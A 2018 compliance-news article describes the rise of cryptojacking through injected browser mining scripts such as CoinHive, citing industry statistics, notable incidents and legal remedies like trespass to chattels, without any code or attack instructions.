Are you in compliance?

Don't miss out! Sign up today for our weekly newsletters and stay abreast of important GRC-related information and news.


Status message

This is subscriber-only content, you are viewing with temporary unrestricted access. For full access, being your free, no obligation 10-day trial.

Cryptocurrencies give rise to a new kind of hacking threat

Breaking Code

Joe Mont | March 6, 2018

There are myriad concerns that go hand-in-hand with crypto-currencies, including fraud, money laundering, and the marketplace tensions still shaking out winners and laggards.

Add another growing concern to the list: system intruders who hijack your organization’s computing power in their quest to mine virtual coins. Experts are calling the practice “drive-by hacking” and “crypto-jacking.” The end-result could leave companies with crippled, slow, or damaged data systems.

The backbone of virtual currencies, best known for Bitcoin, is a network of code-crunchers racing to solve the complex algorithms and math puzzles that reward their time, effort, and computer power with newly minted coins. That unique alternative to how central banks issue fiat currency is a primary appeal of crypto-currencies.

That central appeal is also causing headaches. “Miners”—those who run computers dedicated to processing the blockchain transactions that slowly build up the credits with which to obtain cryptocurrency units such as Bitcoins—have started to shift their operations off computer CPUs (central processing units), choosing instead to leverage far more powerful graphics processing units (GPUs). The resulting demand for GPUs has led to a global parts shortage that is vexing technology vendors and their supply chains.

It gets worse. Even the mightiest of GPUs is proving inefficient and under-powered for mining operations, forcing virtual currency hunters to take their cue from distributed computing and massive feats of inter-connected computing, such as the long-running SETI@Home (Search for Extraterrestrial Intelligence) Project, made possible by individually and voluntarily networked computers all powering the specific and common goal.

Volunteering in the new hacking landscape isn’t such a two-way street. Crypto-miners are meeting their power deficiency by sneaking short bits of code and JavaScript onto corporate and other Websites. That code, inserted through a variety of traditional and creative hacking techniques, has the sole purpose of directly connecting the hijacked computer to a centralized mining service that enlists the violated GPU into the service of coin mining. When a user visits the site, the script runs in the browser and starts mining crypto-currency.

“Miners”—those who run computers dedicated to processing the blockchain transactions that slowly build up the credits with which to obtain cryptocurrency units such as Bitcoins—have started to shift their operations off computer CPUs (central processing units), choosing instead to leverage far more powerful graphics processing units

The stealth usurping of computing power can even affect mobile devices.

Data security software provider Kaspersky Lab predicts that Web miners could be among 2018’s most common cyber-threats. In 2017, the firm’s security solutions stopped the launch of Web miners on more than 70 million occasions, “and the use of such scripts is only set to rise,” it says.

The most common Web miner, and the one used in the vast majority of cases, is CoinHive. Rather than well-known bitcoins, miners are seeking the greater privacy protections and more anonymous nature of upstarts Zcash and Monero, described by one expert as ““crypto-currency of choice for money laundering.”

Kaspersky adds that, from a user’s perspective, the illicit data mining “might look like a normal browser tab simply consuming a lot of resources.” But the “computer slows down and the fan whirs, and the next electricity bill is a shock,” it adds. “Web miners also work on smartphones and tablets, and that’s where they are a real threat: The increased load might cause the device to overheat and irreversibly damage some of its components.”

According to IBM Managed Security Services, crypto-currency mining attacks aimed at enterprise networks jumped six-fold between January and August. Its review of industries targeted revealed that manufacturing and financial services, both at 29 percent, tied for the industry experiencing the highest volume of these types of attacks. Other industries that have been targeted include arts and entertainment, information and communication technology, and retail.

Another research report, the Check Point “2017 Global Cyber Attack Trends Report,” notes that: “One of the most significant trends of the last few months which took the world by storm is the incredibly rapid rise of crypto-currency miners, especially the Web-based type.”

Crypto-mining malware is draining enterprises’ CPU power with an estimated 23 percent of organizations globally being affected by the Coinhive variant during January 2018, according to its latest Global Threat Impact index.

“Over the past three months, crypto-mining malware has steadily become an increasing threat to organizations, as criminals have found it to be a lucrative revenue stream,” says Maya Horowitz, manager of Check Point’s Threat Intelligence Group. “It is particularly challenging to protect against, as it is often hidden in Websites, enabling hackers to use unsuspecting victims to tap into the huge CPU resource that many enterprises have available. As such, it is critical that organizations have the solutions in place that protect against these stealthy cyber-attacks.”

“There are both quasi-legitimate and legitimate uses of this technology to monetize customers,” says Joshua Motta founder and CEO of Coalition, billed as the first technology-enabled cyber-insurance solution. “It is obviously problematic if you don’t disclose you are doing it and do it without their consent. You are stealing their CPU resources for your own gain. There are Websites and publishers who are confirming it and getting consent to do so. I imagine there are people willing to do that, so it’s a fair trade.”

One such site is Salon. It gives visitors a pop-up window giving them two choices: disable all ad blocker extensions, or leave them running and let the site monetize your visit by using unused computing power. It uses Coinhive to mine Monero.

Other sites are far less flagged. The source code for the Showtime Anytime hid illicit mining commands, as did a public Tesla data server.

There are numerous ways hackers find their way into a sites coding, including phishing attacks. Another route that attackers can take is to get in-browser crypto-currency mining code injected into a site via third-party extensions or advertisements.

Motta says the approach is, in some ways, an evolution of ransomware techniques. A variation of the Wannacry attack is known as the Wannamine virus.

“There is no such thing as a victimless crime,” he says. “They are effectively stealing your infrastructure. If your server were to be infected with one of these crypto-currency strains of malware it could consume so much of your CPU and memory resources that the computer is no longer functional for its core purpose. That’s clearly an area where the malware can cause a business impact, even if it may go unnoticed at a small scale.”

Noted security researcher Scott Helme was among those who uncovered that more than 4,000 U.K. Websites, including many government ones, were hosting an undiscovered link to a crypto-mining platform. Among them, the U.K. National Health Service. Also on the list was the main Website of the U.S. court system.

“Companies are already spending so much money on data security services,” says Stephen Kong, a shareholder at the law firm Stradling and chair of its Technology Transactions practice group. “It is another one of those things where each company has to go with their security vendors and have a conversation with them. It is always going to be a game of Whac-A-Mole. The security services companies are always trying to determine what are the latest viruses and other malicious code that get put in, and the party behind the behavior always trying to hide it.”

Crypto-mining, Kong says, “is particularly tough, because it falls into a bit of a gray area. It is definitely invasive to the affected companies, and it causes harm because they have to use more electricity while losing processing power. The reason why it is a gray area, however, and also a bit of a legal conundrum, is that unlike other viruses and hacks, it doesn’t cost companies in terms of lost data or money.”

Most laws are set up to place liability upon companies if they expose customer data to outsiders. “Here, for the most part so far, all these outsiders want is access to processing power,” Kong says. “That causes harm, but not the direct harm that loss of data does.”

His advice, beyond specifically addressing the issue with security vendors, is to continually monitor power consumption processor and memory strain.

“If you see a drop, you may have to suspect that there is some sort of hacker or virus that’s draining your processing power,” Kong says.

If a data miner is discovered, a unique (yet unproven) legal tactic goes back to the turn of the millennium, as third-party companies tried to “scrape” and repackage eBay data. “eBay was able to make successful legal claims based on trespass,” Kong says. “I wonder now if we are going to see a return to those legal claims. When you steal somebody’s processing power, how is that any different than stealing any other property?”

The example he gave was 1999’s eBay v. Bidder’s Edge. Bidder’s Edge, an aggregator of auction listings, accessed eBay more than 100,000 times a day, nearly 2 percent of the sites entire daily traffic. eBay used a “trespass to chattels” claim to win an injunction against the aggregation. The term refers to interfering with another party’s movable personal property.

“When these companies come in and try to scrape my data and servers, it is causing slowdowns in my system and costing me more to process data,” Kong says, explaining how the strategy could be deployed.

Order a Reprint